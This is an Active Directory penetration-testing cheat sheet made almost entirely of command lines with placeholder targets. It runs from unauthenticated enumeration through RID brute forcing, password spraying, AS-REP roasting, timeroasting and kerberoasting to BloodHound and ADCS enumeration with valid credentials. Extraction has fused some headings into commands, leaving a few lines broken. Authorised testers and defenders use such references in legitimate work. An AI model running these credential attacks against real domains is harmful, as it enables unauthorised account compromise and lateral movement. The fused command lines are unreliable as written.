Active Directory Methodology
No credentials
Enumeration
nxc smb <target_ip>
enum4linux -a <target_ip>
nmap -n -sV --script "ldap* and not brute" -p 389 <dc_ip>
ldapsearch -x -H <dc_ip> -s baseZone transfer
dig axfr <domain> @<dc_ip>Shares
nxc smb <dc_ip> -u '' -p '' --shares
nxc smb <dc_ip> -u 'guest' -p '' --sharesEnumerate users
nxc smb <dc_ip> --users
nxc smb <dc_ip> --rid-brute 10000kerbrute userenum -d <domain> <user_wordlist>Timeroast
timeroast.py <dc_ip>Valid user (no password)
Password spray
nxc smb <dc_ip> -u <user_wordlist> -p <password_wordlist> --no-bruteforce --continue-on-successASREP Roast
nxc ldap <dc_ip> -u <user_wordlist> -p '' --asreproast <output>GetNPUsers.py <domain>/ -usersfile <user_wordlist>Blind kerberoast
GetUserSPNs.py -no-preauth <asrep_user> -usersfile <user_wordlist> -dc-host <dc_ip> <domain>/Valid credentials
List all users
nxc smb <dc_ip> -u <user> -p <password> --usersEnumerate SMB shares
nxc smb <dc_ip> -u <user> -p <password> -M spider_plussmbclient.py <user>:<password>@<dc_ip>BloodHound
bloodhound-ce-python -d <domain> -u <user> -p <password> [-ns <dc_ip>] -c All --zipEnumerate LDAP
ldapdomaindump.py -u <domain>\<user> -p <password> -o <output_folder> <dc_ip>Enumerate ADCS
certipy find -u <user>@<domain> -p <password> -dc-ip <dc_ip> -stdoutKerberoast
nxc ldap <dc_ip> -u <user> -p <password> --kerberoasting $OUTPUT_FILEGetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:$PASSWORDIf you find this error from Linux: KRB_AP_ERR_SKEW(Clock skew too great) it's because of your local time, you need to synchronise the host with the DC.
sudo ntpdate <dc_ip>